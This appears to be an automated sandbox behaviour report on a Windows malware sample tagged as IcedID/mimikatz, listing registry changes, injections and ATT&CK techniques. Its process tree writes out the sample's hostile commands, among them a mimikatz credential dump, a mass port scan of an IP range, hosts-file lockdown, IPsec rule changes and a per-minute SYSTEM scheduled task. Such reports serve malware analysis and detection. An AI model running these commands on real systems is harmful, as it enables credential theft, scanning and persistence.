Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ditzew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gaettyt.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xohudmc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	lutllwily.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wpcap.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gaettyt.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2025-01-02_d38fb570d33d6d38d82af8e614fc360e_hacktools_icedid_mimikatz.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4176	cmd.exe
4044	PING.EXE

NSIS installer 3 IoCs

installer

resource	yara_rule
behavioral2/files/0x0007000000023c94-6.dat	nsis_installer_2
behavioral2/files/0x0007000000023cab-14.dat	nsis_installer_1
behavioral2/files/0x0007000000023cab-14.dat	nsis_installer_2

Modifies data under HKEY_USERS 43 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	gaettyt.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	gaettyt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	spitymcii.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	spitymcii.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	spitymcii.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	gaettyt.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	spitymcii.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	spitymcii.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	spitymcii.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	spitymcii.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	spitymcii.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	spitymcii.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	spitymcii.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	gaettyt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals	spitymcii.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	spitymcii.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	spitymcii.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	spitymcii.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	gaettyt.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	spitymcii.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	spitymcii.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	spitymcii.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	spitymcii.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	spitymcii.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	spitymcii.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	spitymcii.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	spitymcii.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	spitymcii.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	spitymcii.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	spitymcii.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	spitymcii.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	spitymcii.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	gaettyt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	spitymcii.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	spitymcii.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	spitymcii.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	spitymcii.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	spitymcii.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	spitymcii.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	spitymcii.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	spitymcii.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	spitymcii.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	spitymcii.exe

Modifies registry class 14 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile"	gaettyt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile"	gaettyt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile"	gaettyt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile"	gaettyt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile"	gaettyt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile"	gaettyt.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\	gaettyt.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\	gaettyt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile"	gaettyt.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\	gaettyt.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\	gaettyt.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\	gaettyt.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\	gaettyt.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\	gaettyt.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4044	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1332	schtasks.exe
4592	schtasks.exe
2888	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe

Suspicious behavior: LoadsDriver 15 IoCs

pid	Process
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
1028	2025-01-02_d38fb570d33d6d38d82af8e614fc360e_hacktools_icedid_mimikatz.exe

Suspicious use of AdjustPrivilegeToken 23 IoCs

description	pid	Process
Token: SeDebugPrivilege	1028	2025-01-02_d38fb570d33d6d38d82af8e614fc360e_hacktools_icedid_mimikatz.exe
Token: SeDebugPrivilege	1616	gaettyt.exe
Token: SeDebugPrivilege	464	gaettyt.exe
Token: SeDebugPrivilege	4964	vfshost.exe
Token: SeDebugPrivilege	4656	spitymcii.exe
Token: SeLockMemoryPrivilege	5104	ceuhqk.exe
Token: SeLockMemoryPrivilege	5104	ceuhqk.exe
Token: SeDebugPrivilege	1236	spitymcii.exe
Token: SeDebugPrivilege	2604	spitymcii.exe
Token: SeDebugPrivilege	620	spitymcii.exe
Token: SeDebugPrivilege	3404	spitymcii.exe
Token: SeDebugPrivilege	4800	spitymcii.exe
Token: SeDebugPrivilege	3176	spitymcii.exe
Token: SeDebugPrivilege	2940	spitymcii.exe
Token: SeDebugPrivilege	880	spitymcii.exe
Token: SeDebugPrivilege	5000	spitymcii.exe
Token: SeDebugPrivilege	4892	spitymcii.exe
Token: SeDebugPrivilege	3004	spitymcii.exe
Token: SeDebugPrivilege	4104	spitymcii.exe
Token: SeDebugPrivilege	2384	spitymcii.exe
Token: SeDebugPrivilege	736	spitymcii.exe
Token: SeDebugPrivilege	1940	spitymcii.exe
Token: SeDebugPrivilege	3180	spitymcii.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
1028	2025-01-02_d38fb570d33d6d38d82af8e614fc360e_hacktools_icedid_mimikatz.exe
1028	2025-01-02_d38fb570d33d6d38d82af8e614fc360e_hacktools_icedid_mimikatz.exe
1616	gaettyt.exe
1616	gaettyt.exe
464	gaettyt.exe
464	gaettyt.exe
452	xohudmc.exe
2132	ditzew.exe
4208	gaettyt.exe
4208	gaettyt.exe
1928	gaettyt.exe
1928	gaettyt.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1028 wrote to memory of 4176	1028	2025-01-02_d38fb570d33d6d38d82af8e614fc360e_hacktools_icedid_mimikatz.exe	83
PID 1028 wrote to memory of 4176	1028	2025-01-02_d38fb570d33d6d38d82af8e614fc360e_hacktools_icedid_mimikatz.exe	83
PID 1028 wrote to memory of 4176	1028	2025-01-02_d38fb570d33d6d38d82af8e614fc360e_hacktools_icedid_mimikatz.exe	83
PID 4176 wrote to memory of 4044	4176	cmd.exe	85
PID 4176 wrote to memory of 4044	4176	cmd.exe	85
PID 4176 wrote to memory of 4044	4176	cmd.exe	85
PID 4176 wrote to memory of 1616	4176	cmd.exe	87
PID 4176 wrote to memory of 1616	4176	cmd.exe	87
PID 4176 wrote to memory of 1616	4176	cmd.exe	87
PID 464 wrote to memory of 4564	464	gaettyt.exe	89
PID 464 wrote to memory of 4564	464	gaettyt.exe	89
PID 464 wrote to memory of 4564	464	gaettyt.exe	89
PID 4564 wrote to memory of 4800	4564	cmd.exe	91
PID 4564 wrote to memory of 4800	4564	cmd.exe	91
PID 4564 wrote to memory of 4800	4564	cmd.exe	91
PID 4564 wrote to memory of 2568	4564	cmd.exe	92
PID 4564 wrote to memory of 2568	4564	cmd.exe	92
PID 4564 wrote to memory of 2568	4564	cmd.exe	92
PID 4564 wrote to memory of 2548	4564	cmd.exe	93
PID 4564 wrote to memory of 2548	4564	cmd.exe	93
PID 4564 wrote to memory of 2548	4564	cmd.exe	93
PID 4564 wrote to memory of 4212	4564	cmd.exe	94
PID 4564 wrote to memory of 4212	4564	cmd.exe	94
PID 4564 wrote to memory of 4212	4564	cmd.exe	94
PID 4564 wrote to memory of 1652	4564	cmd.exe	95
PID 4564 wrote to memory of 1652	4564	cmd.exe	95
PID 4564 wrote to memory of 1652	4564	cmd.exe	95
PID 4564 wrote to memory of 3128	4564	cmd.exe	96
PID 4564 wrote to memory of 3128	4564	cmd.exe	96
PID 4564 wrote to memory of 3128	4564	cmd.exe	96
PID 464 wrote to memory of 2296	464	gaettyt.exe	99
PID 464 wrote to memory of 2296	464	gaettyt.exe	99
PID 464 wrote to memory of 2296	464	gaettyt.exe	99
PID 464 wrote to memory of 4616	464	gaettyt.exe	102
PID 464 wrote to memory of 4616	464	gaettyt.exe	102
PID 464 wrote to memory of 4616	464	gaettyt.exe	102
PID 464 wrote to memory of 4988	464	gaettyt.exe	104
PID 464 wrote to memory of 4988	464	gaettyt.exe	104
PID 464 wrote to memory of 4988	464	gaettyt.exe	104
PID 464 wrote to memory of 208	464	gaettyt.exe	116
PID 464 wrote to memory of 208	464	gaettyt.exe	116
PID 464 wrote to memory of 208	464	gaettyt.exe	116
PID 208 wrote to memory of 1940	208	cmd.exe	118
PID 208 wrote to memory of 1940	208	cmd.exe	118
PID 208 wrote to memory of 1940	208	cmd.exe	118
PID 1940 wrote to memory of 3300	1940	wpcap.exe	119
PID 1940 wrote to memory of 3300	1940	wpcap.exe	119
PID 1940 wrote to memory of 3300	1940	wpcap.exe	119
PID 3300 wrote to memory of 3304	3300	net.exe	121
PID 3300 wrote to memory of 3304	3300	net.exe	121
PID 3300 wrote to memory of 3304	3300	net.exe	121
PID 1940 wrote to memory of 4252	1940	wpcap.exe	122
PID 1940 wrote to memory of 4252	1940	wpcap.exe	122
PID 1940 wrote to memory of 4252	1940	wpcap.exe	122
PID 4252 wrote to memory of 4832	4252	net.exe	124
PID 4252 wrote to memory of 4832	4252	net.exe	124
PID 4252 wrote to memory of 4832	4252	net.exe	124
PID 1940 wrote to memory of 432	1940	wpcap.exe	125
PID 1940 wrote to memory of 432	1940	wpcap.exe	125
PID 1940 wrote to memory of 432	1940	wpcap.exe	125
PID 432 wrote to memory of 3076	432	net.exe	127
PID 432 wrote to memory of 3076	432	net.exe	127
PID 432 wrote to memory of 3076	432	net.exe	127
PID 1940 wrote to memory of 1260	1940	wpcap.exe	128

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1436
- C:\Windows\TEMP\bgegeutip\ceuhqk.exe
  "C:\Windows\TEMP\bgegeutip\ceuhqk.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:5104

C:\Users\Admin\AppData\Local\Temp\2025-01-02_d38fb570d33d6d38d82af8e614fc360e_hacktools_icedid_mimikatz.exe
"C:\Users\Admin\AppData\Local\Temp\2025-01-02_d38fb570d33d6d38d82af8e614fc360e_hacktools_icedid_mimikatz.exe"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1028
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\qpkiztfb\gaettyt.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:4176
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 5
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:4044
- - C:\Windows\qpkiztfb\gaettyt.exe
    C:\Windows\qpkiztfb\gaettyt.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:1616

C:\Windows\qpkiztfb\gaettyt.exe
C:\Windows\qpkiztfb\gaettyt.exe
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:464
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4564
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4800
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    PID:2568
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2548
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4212
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1652
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    PID:3128
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static del all
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2296
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add policy name=Bastards description=FuckingBastards
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:4616
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filteraction name=BastardsList action=block
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:4988
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\utbcclcbi\kgwtlrdzw\wpcap.exe /S
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:208
- - C:\Windows\utbcclcbi\kgwtlrdzw\wpcap.exe
    C:\Windows\utbcclcbi\kgwtlrdzw\wpcap.exe /S
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1940
  - - C:\Windows\SysWOW64\net.exe
      net stop "Boundary Meter"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3300
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Boundary Meter"
        5⤵
        
        PID:3304
  - - C:\Windows\SysWOW64\net.exe
      net stop "TrueSight Meter"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4252
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "TrueSight Meter"
        5⤵
        
        PID:4832
  - - C:\Windows\SysWOW64\net.exe
      net stop npf
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:432
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop npf
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3076
  - - C:\Windows\SysWOW64\net.exe
      net start npf
      4⤵
      PID:1260
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start npf
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4124
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3512
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    PID:4828
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      PID:2868
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4716
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3612
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      System Location Discovery: System Language Discovery
      PID:3844
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\utbcclcbi\kgwtlrdzw\bilutlrif.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\utbcclcbi\kgwtlrdzw\Scant.txt
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1476
- - C:\Windows\utbcclcbi\kgwtlrdzw\bilutlrif.exe
    C:\Windows\utbcclcbi\kgwtlrdzw\bilutlrif.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\utbcclcbi\kgwtlrdzw\Scant.txt
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:3128
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\utbcclcbi\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\utbcclcbi\Corporate\log.txt
  2⤵
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  PID:4364
- - C:\Windows\utbcclcbi\Corporate\vfshost.exe
    C:\Windows\utbcclcbi\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4964
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ytkutiuha" /ru system /tr "cmd /c C:\Windows\ime\gaettyt.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4104
